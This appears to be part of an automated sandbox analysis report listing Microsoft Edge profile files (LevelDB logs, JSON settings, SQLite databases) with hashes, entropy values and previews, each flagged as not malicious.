                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1807709376661615
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHQnYVq2PN723oH+Tcwt8aPrqIFUt8sOH1agZmw+sOH1aIkwON723oH+Tcwt8a4:xaQYVvVaYebL3FUt8sa1ag/+sa1aI5Of
                                                                                                                                                                                                                                                                                                      MD5:A903C8D6610B4D1EC680E77D1A2104EC
                                                                                                                                                                                                                                                                                                      SHA1:5C5F4DB7B6B31B45D13D4D0D11D7F10A8C7913EF
                                                                                                                                                                                                                                                                                                      SHA-256:7B1FFA2439E7F2E6E1706C541FCF05441473C63624703742ACC16D07DED26118
                                                                                                                                                                                                                                                                                                      SHA-512:52979729C839A8757BB250B062097A3F987BB5A77F8C072DEF94502C5CDCDFCB048CEDE47C1722042279AF62CB1FCC57B22811C1DC5451A651DD6351FCE201E4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.647 d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/23-11:14:56.686 d40 Recovering log #3.2024/12/23-11:14:56.686 d40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):329
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.205673190755646
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHUVq2PN723oH+Tcwt865IFUt8sOHgwgZmw+sOHgwIkwON723oH+Tcwt86+ULJ:xaUVvVaYeb/WFUt8saTg/+saTI5OaYev
                                                                                                                                                                                                                                                                                                      MD5:A11AB6D3A48387E146F84AD3F9AEF2F6
                                                                                                                                                                                                                                                                                                      SHA1:E6A80378118CF50FD299C15BEC7E5834C9A1AF01
                                                                                                                                                                                                                                                                                                      SHA-256:B3DCB9B45804B5FCAB391C255FE4C19C08CCCB656763AEB930937CBD3948866D
                                                                                                                                                                                                                                                                                                      SHA-512:76F2F4FE97314947D05154DA66015F47F6E2ACD5C9BADC60E4F5B59AB5DBC4A98B07838EDF8585AC24F922EE6A696BE06CFEC6EFDB5AAB52B74118F8F38096B9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.794 d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/23-11:14:56.795 d40 Recovering log #3.2024/12/23-11:14:56.795 d40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1254
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                      MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                      SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                      SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                      SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.152961418081467
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOyv4q2PN723oH+Tcwt8NIFUt8sOvTZmw+sOvJkwON723oH+Tcwt8+eLJ:x/4vVaYebpFUt8sST/+sSJ5OaYebqJ
                                                                                                                                                                                                                                                                                                      MD5:87D036C68349CD122ABC95CA3AE89B3D
                                                                                                                                                                                                                                                                                                      SHA1:536B9E8C7D4DB985EDE5BD1786708BE8DA301211
                                                                                                                                                                                                                                                                                                      SHA-256:79063868DA8E91A77AFA0BF1ACDA004D8F1B8A24F0A75B5345BAA77D953EE3B9
                                                                                                                                                                                                                                                                                                      SHA-512:BF413B9BACF582FA47D619DBC99540309DEA276EA26911DADB87ECCD8A42EE8E386DA194B6172259051C03DFD099F5A320BB9093AE953FD358D3597AC86C16CB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.516 9e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-11:14:57.517 9e0 Recovering log #3.2024/12/23-11:14:57.517 9e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                      MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                      SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                      SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                      SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):8720
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.21848828281205318
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:GEZllntFlljq7A/mhWJFuQ3yy7IOWUDlvol/dweytllrE9SFcTp4AGbNCV9RUIo:GEZlG75fOlV4/d0Xi99pEY+
                                                                                                                                                                                                                                                                                                      MD5:AB723C943ED9CADCF96D81F53DB681DA
                                                                                                                                                                                                                                                                                                      SHA1:35F0C4E69E5B169B0E4BC7338884884F4ECC29C3
                                                                                                                                                                                                                                                                                                      SHA-256:6052EB658CFAAFCE00388E668D63B1849DE0CFC6E00904A8C80C79C89C855794
                                                                                                                                                                                                                                                                                                      SHA-512:34B8B504C93CFF3CB993AF83B8DFF9FC4A5D6C4277A09B0644C669F16CD46445229D15CCE26C2C834626A32194AE4EAFC12B352EF97ACE0B9A11DD4A1BE02539
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.647749923389689
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:aj9P0UP/Kbtfjl+QkQeragam6IQcO773pLXRKToaADhf:adHP/yl+e2NTO7JRKc39
                                                                                                                                                                                                                                                                                                      MD5:C6D9671A7501295866A46F9B7966AF17
                                                                                                                                                                                                                                                                                                      SHA1:EF8E2FFFD4A5E54588BA517F71B5E5909FDD1A78
                                                                                                                                                                                                                                                                                                      SHA-256:068AAB5F0925A4CC1E153B315E51A6750E8AC9CFB7601D26441BD15960F915EE
                                                                                                                                                                                                                                                                                                      SHA-512:B86D897A5E335ECC1A8018C221003E3D439210EB7CA0139850E98573A29850A6951E9F18214448F1AEEC16887D1F521869A1B7446061DA74F0C3D14322467255
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):409
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2280905639790705
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:xgUthvVaYeb8rcHEZrELFUt8sgUh/+sgU75OaYeb8rcHEZrEZSJ:FTVaYeb8nZrExg8qntOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                      MD5:74B3D5BFFDD145D8FE6F433DF3DC5F7F
                                                                                                                                                                                                                                                                                                      SHA1:78C29A8D76C9880D1266A7C28F8DAC8A4087AC91
                                                                                                                                                                                                                                                                                                      SHA-256:42EC37DF5F1B5775F4B5FEA43484803FC2650383DBFB62D771D30FC74DFFA178
                                                                                                                                                                                                                                                                                                      SHA-512:CD16D953C80BCA3640EE962C271A02BF21B4AC603CB690AE386E2DE3683BFE0CD92D47202B389BC7ED1D36BA01084CC13C1B8BBBA20022DC919C4FF903F55DC2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:00.361 9e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/23-11:15:00.362 9e0 Recovering log #3.2024/12/23-11:15:00.362 9e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1660
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.644184609190933
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:nZZsQvnXZlpV03Sx4/ty8t8Eba7AHHk2GJ348ylsT:nZ1vX7p0hdP8osT
                                                                                                                                                                                                                                                                                                      MD5:BC6A6D2168667C97E45A0688E5CA5BD7
                                                                                                                                                                                                                                                                                                      SHA1:A761F29FDFDEF3A7D776CE51D6ABD6F39D94B04B
                                                                                                                                                                                                                                                                                                      SHA-256:316D1CDED4D6AD13D2831EF2C25E8DADE5FAAB96CF11836E388DC9C301F04043
                                                                                                                                                                                                                                                                                                      SHA-512:77801A749621410DD126FD00DF483794AABEA3D5EA07D16873E2EC5BABA1BB25D16018A27DD6D8F397BC3EEBA2CC55AAA5B3ED64941714313DB161D18EFBF352
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..p..................VERSION.1..META:https://ntp.msn.com............!_https://ntp.msn.com..LastKnownPV..1734970511760.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734970512857.._https://ntp.msn.com..MUID!.264DEDAF8CF36A9502DCF8F18D816BBC.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734970511855,"schedule":[21,-1,-1,-1,-1,31,32],"scheduleFixed":[21,-1,-1,-1,-1,31,32],"simpleSchedule":[18,47,27,31,44,35,30]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734970511729.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Dec 23 2024 11:15:11 GMT-0500 (Eastern Standa
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.170897065744444
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHkp6q2PN723oH+Tcwt8a2jMGIFUt8sOH5TzXZmw+sOHT1kwON723oH+Tcwt8as:xaS6vVaYeb8EFUt8sa5n/+sax5OaYebw
                                                                                                                                                                                                                                                                                                      MD5:45915CB049A4A301E3EB6B437E927DAE
                                                                                                                                                                                                                                                                                                      SHA1:51532688B5398EA96A5CEB469FA853A76E100D47
                                                                                                                                                                                                                                                                                                      SHA-256:4E39AD4700A966AF51FC34051FEEE38E325034493C809796E3D1F7AC7DD0E1A9
                                                                                                                                                                                                                                                                                                      SHA-512:A9B37D1922101E250FCEB9738238AE676139D0236C5DEC25D554954C8DA32F172F1E0D34DE9D3D5C3604A346DF61246BE0F4FC2746003AC5FA1668B8C0AA61A7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.993 640 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/23-11:14:56.994 640 Recovering log #3.2024/12/23-11:14:56.996 640 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1452
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                      MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                      SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                      SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                      SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.782263309926793
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:tTc4OSh6cqWLvhVoqOpVVv+5pXcf0L/ZJVb:Vc4t0cvLvjoqObWpXI0LhJVb
                                                                                                                                                                                                                                                                                                      MD5:F51B499DC273BC5252864BDF4B2D8D43
                                                                                                                                                                                                                                                                                                      SHA1:62053F7F87EA23FBA33AA7B77721E3A219956344
                                                                                                                                                                                                                                                                                                      SHA-256:92AD4AF7432118ABF119069D996896799C5451CB9E73F60987CA7D92FEF0D24F
                                                                                                                                                                                                                                                                                                      SHA-512:6F45AB60CD5D883E4AEDC8827C8A4E73BDA05D21148FF86BCD1BA4A6D62AB5A324010529C028BD4DFDD0005A293F05C2CF5B93D43178998DE1EF07C5D413346C
                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:SQLite format 3 ...
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1452
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                      MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                      SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                      SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                      SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.3781739019338193
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:JkIEumQv8m1ccnvS6mvRN+lGFh52Upsfaaw1a:+IEumQv8m1ccnvS6skK2Ups3r
                                                                                                                                                                                                                                                                                                      MD5:82FD8ACF9D8AD165E5640FF3E9FE669F
                                                                                                                                                                                                                                                                                                      SHA1:C624AD4A06B3421206F8E0DEEEE719375E0A5193
                                                                                                                                                                                                                                                                                                      SHA-256:B8AEA21834B5EF3B0E8611CA56C2E319039C6E07E36CB3E35CC29B6EF77DC2EE
                                                                                                                                                                                                                                                                                                      SHA-512:4A29E6D977AFB8745BEAF07FE57043EF1C772EBB930FBF1C57EA7B3F2EB7ADEDC553ABC6BC6A16E5F00DB2E56C1C8524058A1BF5E0436DC45A2B14EC87A86DF5
                                                                                                                                                                                                                                                                                                      Malicious:false
Preview:SQLite format 3 ...
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
